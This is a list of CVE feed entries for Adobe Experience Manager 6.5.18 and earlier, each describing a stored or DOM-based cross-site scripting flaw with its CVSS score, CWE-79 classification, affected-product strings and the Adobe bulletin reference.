Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48560
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48561

First published on : 15-12-2023 11:15:34
Last modified on : 16-12-2023 01:40:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48561
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48562

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:40:53

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48562
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48563

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:40:45

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48563
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48564

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:40:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48564
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48565

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:39:41

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48565
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48566

First published on : 15-12-2023 11:15:35
Last modified on : 16-12-2023 01:39:32

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48566
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48567

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48567
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48568

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:23

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48568
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48569

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48569
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48570

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48570
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48571

First published on : 15-12-2023 11:15:36
Last modified on : 16-12-2023 01:39:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48571
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48572

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:26:34

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48572
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48573

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:26:26

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48573
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48574

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:26:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48574
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48575

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:25:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48575
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48576

First published on : 15-12-2023 11:15:37
Last modified on : 16-12-2023 01:25:46

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48576
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48577

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:25:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48577
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48578

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:25:30

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48578
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48579

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:24:45

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48579
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48580

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:24:07

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48580
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48581

First published on : 15-12-2023 11:15:38
Last modified on : 16-12-2023 01:10:18

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48581
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48582

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:11:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48582
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48583

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:11:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48583
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48584

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:12:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48584
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48585

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:13:03

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48585
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48586

First published on : 15-12-2023 11:15:39
Last modified on : 16-12-2023 01:13:14

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48586
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48587

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:13:40

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48587
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48588

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:13:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48588
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48589

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:14:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48589
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48590

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:14:08

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48590
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48591

First published on : 15-12-2023 11:15:40
Last modified on : 16-12-2023 01:15:33

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48591
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48592

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:15:52

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48592
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48593

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:00

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48593
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48594

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:10

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48594
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48595

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:22

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48595
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48596

First published on : 15-12-2023 11:15:41
Last modified on : 16-12-2023 01:16:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48596
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48597

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:16:41

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48597
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

